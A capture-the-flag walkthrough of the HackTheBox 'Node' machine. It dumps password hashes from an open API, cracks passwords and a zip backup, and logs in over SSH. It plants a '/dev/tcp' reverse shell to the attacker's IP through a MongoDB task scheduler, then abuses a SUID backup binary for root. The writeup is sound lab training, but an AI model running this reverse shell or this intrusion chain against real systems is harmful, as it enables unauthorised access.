# HTB — Node

Web | Medium | Linux

Node.js API endpoint exposes hashed admin credentials. MongoDB backup decryption and SUID binary analysis for root.

April 5, 2022 · HackTheBox

#Node.js #MongoDB #API #SUID

## Enumeration
```sh
nmap -sC -sV 10.10.10.58 -oN node_scan
```

```sh
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```sh
nmap -A -p- -sC -sV 10.10.10.58 -oN node_scan_2
```

- We cannot use dirbuster, gobuster or any other automated directory search tool: there is a filter that blocks them.

```sh
gobuster dir -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n
```

- If we curl the site we get the response headers and the page source:

```sh
curl -vvv 10.10.10.58:3000
```

```sh
* Trying 10.10.10.58:3000...
* Connected to 10.10.10.58 (10.10.10.58) port 3000 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.58:3000
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Accept-Ranges: bytes
< Cache-Control: public, max-age=0
< Last-Modified: Sat, 02 Sep 2017 11:27:58 GMT
< ETag: W/"f15-15e4258ef70"
< Content-Type: text/html; charset=UTF-8
< Content-Length: 3861
< Date: Fri, 11 Mar 2022 04:14:30 GMT
< Connection: keep-alive
<
<!doctype html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en" ng-csp="" ng-app="myplace"> <!--<![endif]-->
<head>
<base href="/">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>MyPlace</title>
<!-- Bootstrap Core CSS -->
<link href="/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Theme CSS -->
<link href="/assets/css/freelancer.min.css" rel="stylesheet">
<link href="/assets/css/app.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic" rel="stylesheet" type="text/css">
</head>
<body id="page-top" class="index">
<!-- Navigation -->
<nav id="mainNav" class="navbar navbar-default navbar-fixed-top navbar-custom">
<div class="container">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header page-scroll">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
<span class="sr-only">Toggle navigation Menu <i class="fa fa-bars"></i>
</button>
<a class="navbar-brand" href="/">MyPlace</a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav navbar-right">
<li class="hidden">
<a href="/"></a>
</li>
<li class="page-scroll">
<a href="/login">Login</a>
</li>
</ul>
</div>
<!-- /.navbar-collapse -->
</div>
<!-- /.container-fluid -->
</nav>
<!-- Header -->
<header>
<div class="container">
<div class="row">
<div class="col-lg-12">
<img class="img-responsive" src="img/profile.png" alt="">
<div class="intro-text">
<span class="name">Welcome to MyPlace
</div>
</div>
</div>
</div>
</header>
<!--[if lt IE 8]>
<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->
<div data-ng-view=""></div>
</body>
<script type="text/javascript" src="vendor/jquery/jquery.min.js"></script>
<script type="text/javascript" src="vendor/bootstrap/js/bootstrap.min.js"></script>
<script type="text/javascript" src="vendor/angular/angular.min.js"></script>
<script type="text/javascript" src="vendor/angular/angular-route.min.js"></script>
<script type="text/javascript" src="assets/js/app/app.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/home.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/login.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/admin.js"></script>
<script type="text/javascript" src="assets/js/app/controllers/profile.js"></script>
<script type="text/javascript" src="assets/js/misc/freelancer.min.js"></script>
</html>
* Connection #0 to host 10.10.10.58 left intact
```

- The X-Powered-By: Express header confirms a Node.js app. We can set the User-Agent header ourselves to see what the filter does:
```sh
curl -H "User-Agent: Dirbuster" 10.10.10.58:3000
```

```sh
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQDQf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
<!-- ... -->
```

## Exploitation
- Inspecting the website we found a couple of interesting paths:
  - assets/js/app/app.js
  - assets/js/app/controllers/home.js
  - assets/js/app/controllers/login.js
  - assets/js/app/controllers/admin.js
  - assets/js/app/controllers/profile.js
  - assets/js/misc/freelancer.min.js
- Let's check /api/admin/backup, found in admin.js
- Nothing really interesting here
- /api/users/ returns every user record, password hash included:

```json
[
  {
    "_id": "59a7365b98aa325cc03ee51c",
    "username": "myP14ceAdm1nAcc0uNT",
    "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
    "is_admin": true
  },
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]
```
- Using an online password cracker → https://crackstation.net/ (the hashes are plain, unsalted SHA-256 of the password, which is why a lookup table works):

```sh
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af # manchester
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73 # snowflake
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0 # Not found
```

- Logged in with myP14ceAdm1nAcc0uNT | manchester

- Download the backup file
- It looks like base64:

```sh
file myplace.backup
-> myplace.backup: ASCII text, with very long lines (65536), with no line terminators
```

- Decode the base64 file:

```sh
cat myplace.backup | base64 -d > myplace
file myplace
-> myplace: Zip archive data, at least v1.0 to extract, compression method=store
unzip myplace # requires a password
fcrackzip -uDp /usr/share/wordlists/rockyou.txt ./myplace
# [-u] use unzip to weed out wrong passwords
# [-D] use a dictionary
# [-p] use string as initial password/file
PASSWORD FOUND!!!!: pw == magicword
```

- Opening app.js from the extracted backup we can find some credentials:
- mark | 5AYRft73VtFpc84k

```sh
ssh mark@10.10.10.58
```

- The user flag belongs to tom, but we need more privileges to get access as tom

```sh
ps aux # see the running processes
```

- There is an interesting path, /var/scheduler/app.js:

```sh
nano /var/scheduler/app.js
```

```js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;

const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);
});
```

- MongoDB stores information as collections.
- We can connect to the scheduler database and insert a new document into the tasks collection with the command we want; every 30 seconds the scheduler runs it through exec(doc.cmd)
- mark : 5AYRft73VtFpc84k
- Connecting to the scheduler database. Ref → https://docs.mongodb.com/v4.4/mongo/
```sh
mongo --username mark --password 5AYRft73VtFpc84k scheduler
> show collections
tasks
```

- SSH in from another terminal and place a reverse shell in /tmp
```sh
ssh mark@10.10.10.58
cd /tmp
nano shell.sh
---
bash -i >& /dev/tcp/10.10.14.18/8080 0>&1
---
nc -lvnp 8080
```

- Back in the mongo shell, insert the task:

```sh
db.tasks.find()
db.tasks.insertOne({cmd: "bash /tmp/shell.sh"});
---
{
"acknowledged" : true,
"insertedId" : ObjectId("622bbe2b5804df2507a28893")
}
---
db.tasks.find() # check if the task is still there; if it is gone, the scheduler has already run it and we have a shell
```

## Interactive Shell
```sh
which python
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
[enter]
export TERM=screen
cat /tom/user.txt
-> e1156acc...
```

## Privilege Escalation

- Looking at the MyPlace app.js, this part will help to escalate privileges (its /api/admin/backup route spawns /usr/local/bin/backup, which is SUID, with a hard-coded key):

```sh
find / -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount
```
```sh
cd /usr/local/bin
```

app.js:

```js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
app.use(session({
secret: 'the boundless tendency initiates the law.',
cookie: { maxAge: 3600000 },
resave: false,
saveUninitialized: false
}));
app.use(function (req, res, next) {
var agent = req.headers['user-agent'];
var blacklist = /(DirBuster)|(Postman)|(Mozilla\/4\.0.+Windows NT 5\.1)|(Go\-http\-client)/i;
if (!blacklist.test(agent)) {
next();
}
else {
count = Math.floor((Math.random() * 10000) + 1);
randomString = '';
var charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var i = 0; i < count; i++)
randomString += charset.charAt(Math.floor(Math.random() * charset.length));
res.set('Content-Type', 'text/plain').status(200).send(
[
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ',
'QQQQQQQQQQQQQP\'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ',
'QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ',
'QQQQQQQQQQW\' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ',
'QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ',
'QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ',
'QQQQQQQP\'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ',
'QQQQQP\'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP\' "??\' =QQmWWV?46/ ?QQQQQ',
'QQQP\'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ',
'QQ[ j@mQP\'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ',
'QW jQkQ@ jWQQD\'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ',
'QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ',
'QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ',
'QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??\'<mWWWWWQW?^ ` ]6QQ\' yQQQQQ',
'QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ',
'QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ',
'QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ',
'QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <c jWQ ]QQQQQQQ',
'QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ\'.mQQQmaa,., . .; QWQ.]QQQQQQQ',
'QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ',
'QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ',
'QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ',
'QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ',
'QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ',
'QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW',
'QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ',
'QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ',
'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ',
'QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ',
'',
'',
'<!-- ' + randomString + ' -->'
].join("\n")
);
}
});
app.use(express.static(path.join(__dirname, 'static')));
app.use(bodyParser.json());
app.use(function(err, req, res, next) {
if (err) {
res.status(err.status || 500);
res.send({
message:"Uh oh, something went wrong!",
error: true
});
}
else {
next();
}
});
app.get('/api/users/?', function (req, res) {
db.collection('users').find().toArray(function (error, docs) {
if (error) {
res.status(500).send({ error: true });
}
else if (!docs) {
res.status(404).send({ not_found: true });
}
else {
res.send(docs);
}
});
});
app.get('/api/users/latest', function (req, res) {
db.collection('users').find({ is_admin: false }).toArray(function (error, docs) {
if (error) {
res.status(500).send({ error: true });
}
else if (!docs) {
res.status(404).send({ not_found: true });
}
else {
res.send(docs);
}
});
});
app.get('/api/users/:username', function (req, res) {
db.collection('users').findOne({ username: req.params.username }, function (error, doc) {
if (error) {
res.status(500).send({ error: true });
}
else if (!doc) {
res.status(404).send({ not_found: true });
}
else {
res.send(doc);
}
});
});
app.get('/api/session', function (req, res) {
if (req.session.user) {
res.send({
authenticated: true,
user: req.session.user
});
}
else {
res.send({
authenticated: false
});
}
});
app.post('/api/session/authenticate', function (req, res) {
var failureResult = {
error: true,
message: 'Authentication failed'
};
if (!req.body.username || !req.body.password) {
res.send(failureResult);
return;
}
db.collection('users').findOne({ username: req.body.username }, function (error, doc) {
if (error) {
res.status(500).send({
message:"Uh oh, something went wrong!",
error: true
});
return;
}
if (!doc) {
res.send(failureResult);
return;
}
var hash = crypto.createHash('sha256');
var cipherText = hash.update(req.body.password).digest('hex');
if (cipherText == doc.password) {
req.session.user = doc;
res.send({
success: true
});
}
else {
res.send({
success: false
})
}
});
});
app.get('/api/admin/backup', function (req, res) {
if (req.session.user && req.session.user.is_admin) {
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
var backup = '';
proc.on("exit", function(exitCode) {
res.header("Content-Type", "text/plain");
res.header("Content-Disposition", "attachment; filename=myplace.backup");
res.send(backup);
});
proc.stdout.on("data", function(chunk) {
backup += chunk;
});
proc.stdout.on("end", function() {
});
}
else {
res.send({
authenticated: false
});
}
});
app.use(function(req, res, next){
res.sendFile('app.html', { root: __dirname });
});
app.listen(3000, function () {
console.log('MyPlace app listening on port 3000!')
});
});
```
```sh
backup -q testing /root
backup -q /root
backup testing testing /root
---
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
[!] Ah-ah-ah! You didn't say the magic word!
```

## ltrace
- We can use ltrace to display the calls the binary makes to shared libraries:

```sh
ltrace backup testing testing /root
```

```sh
strncpy(0xff8251a8, "testing", 100) = 0xff8251a8
strcpy(0xff825191, "/") = 0xff825191
strcpy(0xff82519d, "/") = 0xff82519d
strcpy(0xff825127, "/e") = 0xff825127
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x98ff410
fgets("a01a6aa5..."..., 1000, 0x98ff410) = 0xff824d3f
strcspn("a01a6aa5..."..., "\n") = 64
strcmp("testing", "a01a6aa5..."...) = 1
fgets("45fac180..."..., 1000, 0x98ff410) = 0xff824d3f
strcspn("45fac180..."..., "\n") = 64
strcmp("testing", "45fac180..."...) = 1
fgets("3de811f4..."..., 1000, 0x98ff410) = 0xff824d3f
strcspn("3de811f4..."..., "\n") = 64
strcmp("testing", "3de811f4..."...) = 1
fgets("\n", 1000, 0x98ff410) = 0xff824d3f
strcspn("\n", "\n") = 0
strcmp("testing", "") = 1
fgets(nil, 1000, 0x98ff410) = 0
strcpy(0xff823d78, "Ah-ah-ah! You didn't say the mag"...) = 0xff823d78
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Ah-ah-ah! You didn't say the mag"...
[!] Ah-ah-ah! You didn't say the magic word!
```

- The binary reads /etc/myplace/keys line by line, so we can look at that file directly
- It compares the key we passed against each line with strcmp: strcmp("testing", "a01a6aa5..."...) = 1

```sh
cat /etc/myplace/keys
---
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
---
```

```sh
backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 /root # let's try with the last key
---
...
```

```sh
echo -n "..." | base64 -d > root.zip # "..." is the base64 blob printed by the previous command
unzip root.zip
7z e root.zip # [e] Extract files from archive
password: magicword
```

```sh
cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP" <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^ ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
